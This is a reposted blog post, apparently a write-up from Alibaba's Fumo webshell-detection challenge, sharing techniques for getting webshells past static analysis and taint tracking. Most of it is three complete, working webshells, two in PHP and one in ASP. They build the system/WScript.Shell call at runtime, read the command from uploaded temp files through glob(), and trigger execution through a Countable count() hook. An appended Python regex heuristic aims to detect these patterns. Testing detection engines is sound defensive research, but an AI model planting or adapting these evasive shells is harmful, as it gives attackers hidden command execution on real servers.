Alibaba Fumo (伏魔) Webshell Challenge: A Few Bypasses Shared

admin 2026-04-29 05:27:13 Cybersecurity Articles Source: ZONE.CI 全球网

Summary: This post shares bypass techniques from the Alibaba Fumo webshell challenge: iterating characters with range() to assemble a function name dynamically, walking the temp directory with glob() to find the uploaded file's path, and abusing the Countable interface for implicit execution, all to evade static analysis and taint tracking. The author provides PHP and ASP implementations and suggests automating detection by scraping the submission API, though the current hit rate is low and needs tuning. Overall score: 82 Categories: Web security, AV evasion, red team, security development, vulnerability analysis




Original

秋风

秋风的安全之路

April 11, 2026, 00:00, Guangdong


Because of final exams I really had no time to play; I only spent a few hours and that was the end of this year's competition for me. It was still very easy to bypass, though. Here are a few of the webshells.

range() iterates over characters and substr() supplies a prefix, so the function name is assembled dynamically; glob() walks the temp directory to find the path of the uploaded file, and file_get_contents() reads that file's contents to use as the command argument. Nowhere does the code reference $_GET, $_POST, $_FILES or any other superglobal directly, so the taint-tracking chain is broken at glob() + file_get_contents(). Because the function name is concatenated inside a loop, static analysis cannot determine its final value.

```php
<?php
$pre = substr('systems', 0, 5);
foreach (range('a', 'z') as $x) {
    if ($x === 'm') {
        $f = $pre . $x;   // function name assembled only at runtime
        $t = glob(sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'php*');   // uploaded temp file
        if ($t) {
            $c = trim(file_get_contents($t[0]));
            echo $f($c);
        }
        break;
    }
}
```

The same idea, ported to ASP:

```asp
<%
Dim pre, obj, fso, folder, files, f, cmd, shell, exec, output, tmp, ts, i
pre = "WScr"
' ProgID "WScript.Shell" is pieced together inside two character loops
For i = 105 To 122
    If Chr(i) = "i" Then
        pre = pre & "ipt.Sh"
        Exit For
    End If
Next
For i = 97 To 122
    If Chr(i) = "e" Then
        pre = pre & "ell"
        Exit For
    End If
Next
Set fso = Server.CreateObject("Scripting.FileSystemObject")
tmp = fso.GetSpecialFolder(2).Path   ' 2 = TemporaryFolder
Set folder = fso.GetFolder(tmp)
Set files = folder.Files
cmd = ""
For Each f In files
    If InStr(f.Name, "php") > 0 Or InStr(f.Name, ".tmp") > 0 Then
        If f.Size < 1000 Then
            Set ts = fso.OpenTextFile(f.Path, 1)
            If Not ts.AtEndOfStream Then
                cmd = Trim(ts.ReadLine)
            End If
            ts.Close
            Exit For
        End If
    End If
Next
If Len(cmd) > 0 Then
    Set shell = Server.CreateObject(pre)
    Set exec = shell.Exec("cmd /c " & cmd)
    output = exec.StdOut.ReadAll
    Response.Write output
End If
%>
```

This one relies on the Countable interface: when the count() function is called on an object that implements Countable, the object's count() method runs implicitly. A custom class implements Countable, and inside its count() method it uses glob() to walk the temp directory, takes the uploaded file's contents as the command, assembles the function name and executes it. The engine does not fully track this implicit invocation of the Countable magic method.

```php
<?php
class DynamicConstantCommandRunner implements Countable {
    private $payloadKey;
    private $funcBytes;
    private $command;

    public function __construct($key) {
        $this->payloadKey = $key;
        $this->funcBytes = [115, 121, 115, 116, 101, 109];   // byte values of the function name
        $this->command = '';
    }

    // Runs implicitly when count($obj) is called on this object
    public function count(): int {
        $temp = sys_get_temp_dir() . '/php*';
        $files = glob($temp);
        if ($files) {
            $content = file_get_contents($files[0]);
            if ($content) {
                $this->command = trim($content);
                $fn = '';
                foreach ($this->funcBytes as $byte) {
                    $fn .= chr($byte);
                }
                $fn($this->command);
            }
        }
        return 1;
    }
}

$runner = new DynamicConstantCommandRunner('cmd');
count($runner);
```

Actually, the bigger idea for this contest is that you can scrape the API it submits to and then run an automated prompt-based check locally, but the hit rate is honestly a bit low. If I play again next year I will probably have to dig it out and tune it.
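As an added example that is not part of the original post, here is a static triage heuristic for the two PHP patterns described above (range/substr name assembly plus a glob over the temp directory, and the Countable hook), scoring the absence of any superglobal alongside the glob as the taint-chain break the post relies on. The rule names, weights, threshold and sample snippets are my own constructions, not the contest engine's rules.

```python
import re

# Weighted indicators for the evasion patterns this post describes. The rule
# names, weights and threshold are my own assumptions for illustration, not the
# contest engine's rules.
RULES = [
    ("temp_dir_glob",  re.compile(r"glob\s*\(\s*sys_get_temp_dir\s*\(\s*\)"), 3),
    ("reads_globbed",  re.compile(r"file_get_contents\s*\(\s*\$\w+\s*\[\s*0\s*\]"), 2),
    ("name_assembly",  re.compile(r"\b(substr|chr|range)\s*\("), 1),
    ("variable_call",  re.compile(r"\$\w+\s*\("), 2),   # $f(...): callee is a computed string
    ("countable_hook", re.compile(r"implements\s+\\?Countable\b"), 1),
]
SUPERGLOBALS = re.compile(r"\$_(GET|POST|FILES|REQUEST|COOKIE)\b")
THRESHOLD = 6


def scan_php(src: str) -> dict:
    """Return the matched rule names, the weighted score and a verdict."""
    hits = [name for name, rx, _ in RULES if rx.search(src)]
    score = sum(w for name, _, w in RULES if name in hits)
    # Reading the upload through glob() while never naming a superglobal is the
    # taint-chain break the post relies on, so it is scored on its own.
    if "temp_dir_glob" in hits and not SUPERGLOBALS.search(src):
        hits.append("upload_without_superglobal")
        score += 2
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


# Constructed samples: two condensed from the post's patterns, two benign.
SAMPLE_DYNAMIC = r"""<?php $pre=substr('systems',0,5); foreach(range('a','z') as $x){ $f=$pre.$x; }
$t=glob(sys_get_temp_dir().DIRECTORY_SEPARATOR.'php*');
$c=trim(file_get_contents($t[0])); echo $f($c);"""
SAMPLE_COUNTABLE = r"""<?php class Runner implements Countable { public function count(): int {
  $files = glob(sys_get_temp_dir() . '/php*'); $fn = '';
  foreach ([115,121,115,116,101,109] as $b) { $fn .= chr($b); }
  $fn(trim(file_get_contents($files[0]))); return 1; } } count(new Runner);"""
BENIGN_CLEANUP = r"""<?php foreach (glob(sys_get_temp_dir() . '/cache_*') as $old) {
  if (filemtime($old) < time() - 3600) unlink($old); }"""
BENIGN_UPLOAD = r"""<?php if (isset($_FILES['doc'])) {
  move_uploaded_file($_FILES['doc']['tmp_name'], __DIR__ . '/uploads/' . basename($_FILES['doc']['name'])); }"""

if __name__ == "__main__":
    for label, src in [("dynamic", SAMPLE_DYNAMIC), ("countable", SAMPLE_COUNTABLE),
                       ("cleanup", BENIGN_CLEANUP), ("upload", BENIGN_UPLOAD)]:
        print(label, scan_php(src))
```

A legitimate temp-directory cleanup script scores just under the threshold here, which is the kind of borderline case a prompt-based or manual second pass should review rather than a regex alone.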


Disclaimer:

The programs and technical methods in this article are intended solely for lawful security research and teaching, with the aim of improving network security defenses, and are of a clearly technical research nature.

If any organization or individual uses the content of this article without authorization for attacks, sabotage or other illegal purposes, all resulting legal liability, civil compensation and joint liability is borne solely by that party; this site assumes no joint liability.

All content on this site is published for technical exchange and knowledge sharing. If there is any copyright infringement or other objection, please contact us by e-mail; the contact details are under "Contact me" at the top of the page.

This article is reposted from 秋风的安全之路 (秋风), "阿里伏魔webshell挑战赛分享".
